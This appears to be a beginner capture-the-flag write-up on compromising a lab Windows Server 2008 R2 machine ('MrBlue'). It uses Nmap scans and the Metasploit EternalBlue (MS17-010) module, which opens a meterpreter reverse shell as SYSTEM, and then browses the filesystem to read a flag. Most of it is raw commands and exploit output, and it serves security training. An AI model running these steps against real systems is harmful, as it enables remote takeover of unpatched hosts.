The MrBlue machine was a classic EternalBlue exploit challenge for beginners. This was a great opportunity to learn about vulnerabilities in SMB and practice exploitation using Metasploit.
Key Takeaways:
- EternalBlue exploits SMB vulnerabilities, particularly on port 445.
- Always verify your exploit target to avoid failed attempts.
- Metasploit simplifies exploitation, but understanding the underlying vulnerability is crucial.
Feel free to try this machine and share your experiences! 🎉
Initial Thoughts
The name "MrBlue" hints at the infamous EternalBlue exploit (MS17-010), which targets vulnerabilities in the SMB protocol. This was my primary lead.
Step 1: Scanning the Target
First, I started with a quick Nmap scan to check open ports and services on the target:
db_nmap 10.150.150.242
Results showed several ports were open, including port 445 (SMB service):
PORT STATE SERVICE 53/tcp open domain 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1433/tcp open ms-sql-s 3389/tcp open ms-wbt-server
[msf](Jobs:0 Agents:0) >> db_nmap 10.150.150.242
[*] Nmap: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 11:43 EAT
[*] Nmap: Nmap scan report for 10.150.150.242
[*] Nmap: Host is up (0.28s latency).
[*] Nmap: Not shown: 985 closed tcp ports (reset)
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 53/tcp open domain
[*] Nmap: 80/tcp open http
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: 1433/tcp open ms-sql-s
[*] Nmap: 3389/tcp open ms-wbt-server
[*] Nmap: 8089/tcp open unknown
[*] Nmap: 49152/tcp open unknown
[*] Nmap: 49153/tcp open unknown
[*] Nmap: 49154/tcp open unknown
[*] Nmap: 49155/tcp open unknown
[*] Nmap: 49156/tcp open unknown
[*] Nmap: 49157/tcp open unknown
[*] Nmap: 49158/tcp open unknown
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 3.86 seconds
[msf](Jobs:0 Agents:0) >> db_nmap -sV -sC 53,80,135,139,445,1433,3389 10.150.150.242
[*] Nmap: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 11:45 EAT
[*] Nmap: 'Failed to resolve "53,80,135,139,445,1433,3389".'
[-] db_nmap: Interrupted
[msf](Jobs:0 Agents:0) >> db_nmap -sV -sC -p53,80,135,139,445,1433,3389 10.150.150.242
[*] Nmap: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 11:45 EAT
[*] Nmap: Nmap scan report for 10.150.150.242
[*] Nmap: Host is up (0.23s latency).
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 53/tcp filtered domain
[*] Nmap: 80/tcp filtered http
[*] Nmap: 135/tcp filtered msrpc
[*] Nmap: 139/tcp filtered netbios-ssn
[*] Nmap: 445/tcp filtered microsoft-ds
[*] Nmap: 1433/tcp filtered ms-sql-s
[*] Nmap: 3389/tcp filtered ms-wbt-server
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 4.35 seconds
[msf](Jobs:0 Agents:0) >>
Step 2: Exploit Discovery
Using Metasploit, I searched for modules related to EternalBlue:
search eternalblue
The module of interest was:
exploit/windows/smb/ms17_010_eternalblue
[msf](Jobs:0 Agents:0) >> search eternalblue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
Step 3: Setting Up the Exploit
I loaded the module and configured the necessary parameters:
use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 10.150.150.242 set RPORT 445 set LHOST tun0
I verified the target's vulnerability before running the exploit:
run
Metasploit confirmed the target was vulnerable!
[msf](Jobs:0 Agents:0) >> use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set RHOSTS 10.150.150.242
RHOSTS => 10.150.150.242
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set RPORT 445
RPORT => 445
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set LHOST tun0
LHOST => tun0
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> option
[-] Unknown command: option
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.150.150.242 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target mac
hines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machine
s.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
Step 4: Exploiting the Target
Once validated, the exploit ran successfully. After some time, I gained a Meterpreter session as NT AUTHORITY\SYSTEM—the highest privilege level on Windows!
getuid Server username: NT AUTHORITY\SYSTEM
Step 5: Capturing the Flag
I navigated through the filesystem to locate the flag on the Administrator's desktop:
cd C:\Users\Administrator.GNBUSCA-W054\Desktop ls cat FLAG34.txt
And there it was—FLAG34.txt contained the hash:
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> run
[*] Started reverse TCP handler on 10.66.66.54:4444
[*] 10.150.150.242:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.150.150.242:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 10.150.150.242:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.150.150.242:445 - The target is vulnerable.
[*] 10.150.150.242:445 - Connecting to target for exploitation.
[+] 10.150.150.242:445 - Connection established for exploitation.
[+] 10.150.150.242:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.150.150.242:445 - CORE raw buffer dump (53 bytes)
[*] 10.150.150.242:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.150.150.242:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 10.150.150.242:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P
[*] 10.150.150.242:445 - 0x00000030 61 63 6b 20 31 ack 1
[+] 10.150.150.242:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.150.150.242:445 - Trying exploit with 12 Groom Allocations.
[*] 10.150.150.242:445 - Sending all but last fragment of exploit packet
[*] 10.150.150.242:445 - Starting non-paged pool grooming
[+] 10.150.150.242:445 - Sending SMBv2 buffers
[+] 10.150.150.242:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.150.150.242:445 - Sending final SMBv2 buffers.
[*] 10.150.150.242:445 - Sending last fragment of exploit packet!
[*] 10.150.150.242:445 - Receiving response from exploit packet
[+] 10.150.150.242:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.150.150.242:445 - Sending egg to corrupted connection.
[*] 10.150.150.242:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 10.150.150.242
[*] Meterpreter session 1 opened (10.66.66.54:4444 -> 10.150.150.242:51246) at 2024-09-10 11:48:40 +0300
[+] 10.150.150.242:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.150.150.242:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.150.150.242:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
(Meterpreter 1)(C:\Windows\system32) > getuid
Server username: NT AUTHORITY\SYSTEM
(Meterpreter 1)(C:\Windows\system32) > cd C:\
> /
(Meterpreter 1)(C:\) > dir
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 4096 dir 2009-07-14 05:34:39 +0300 $Recycle.Bin
040777/rwxrwxrwx 0 dir 2009-07-14 08:06:44 +0300 Documents and Settings
040777/rwxrwxrwx 0 dir 2009-07-14 06:20:08 +0300 PerfLogs
040555/r-xr-xr-x 4096 dir 2020-01-17 21:27:24 +0300 Program Files
040555/r-xr-xr-x 4096 dir 2019-10-25 12:04:54 +0300 Program Files (x86)
040777/rwxrwxrwx 4096 dir 2019-05-23 23:14:19 +0300 ProgramData
040777/rwxrwxrwx 0 dir 2016-06-27 19:03:35 +0300 Recovery
040777/rwxrwxrwx 4096 dir 2016-11-04 21:43:25 +0300 System Volume Information
040555/r-xr-xr-x 4096 dir 2019-05-23 23:33:19 +0300 Users
040777/rwxrwxrwx 16384 dir 2020-01-17 21:27:24 +0300 Windows
040777/rwxrwxrwx 4096 dir 2016-06-27 12:36:28 +0300 inetpub
000000/--------- 0 fif 1970-01-01 03:00:00 +0300 pagefile.sys
(Meterpreter 1)(C:\) > cd Users\
> /
(Meterpreter 1)(C:\Users) > dir
Listing: C:\Users
=================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 8192 dir 2019-05-23 23:14:28 +0300 Administrator.GNBUSCA-W054
040777/rwxrwxrwx 0 dir 2009-07-14 08:06:44 +0300 All Users
040777/rwxrwxrwx 0 dir 2016-06-27 12:05:13 +0300 Classic .NET AppPool
040555/r-xr-xr-x 8192 dir 2009-07-14 09:29:45 +0300 Default
040777/rwxrwxrwx 0 dir 2009-07-14 08:06:44 +0300 Default User
040777/rwxrwxrwx 8192 dir 2016-06-27 11:58:38 +0300 MSSQL$SQLEXPRESS
040555/r-xr-xr-x 4096 dir 2009-07-14 07:57:55 +0300 Public
100666/rw-rw-rw- 174 fil 2009-07-14 07:57:55 +0300 desktop.ini
(Meterpreter 1)(C:\Users) > ls All\ Users\\
ls All\ Users\\Application\ Data\\ ls All\ Users\\Favorites\\ ls All\ Users\\Package\ Cache\\ ls All\ Users\\VMware\\
ls All\ Users\\Desktop\\ ls All\ Users\\GroupPolicy\\ ls All\ Users\\Start\ Menu\\ ls All\ Users\\VsTelemetry\\
ls All\ Users\\Documents\\ ls All\ Users\\Microsoft\\ ls All\ Users\\Templates\\
(Meterpreter 1)(C:\Users) > ls All\ Users\\Desktop\\
[-] stdapi_fs_ls: Operation failed: Access is denied.
(Meterpreter 1)(C:\Users) > ls Administrator.GNBUSCA-W054\\Desktop\\
Listing: Administrator.GNBUSCA-W054\Desktop\
============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 40 fil 2019-05-24 18:19:38 +0300 FLAG34.txt
100666/rw-rw-rw- 282 fil 2019-05-23 23:14:29 +0300 desktop.ini
(Meterpreter 1)(C:\Users) > cd Administrator.GNBUSCA-W054\\Desktop\\
(Meterpreter 1)(C:\Users\Administrator.GNBUSCA-W054\Desktop) > cat FLAG34.txt
[ REDUCTED ]
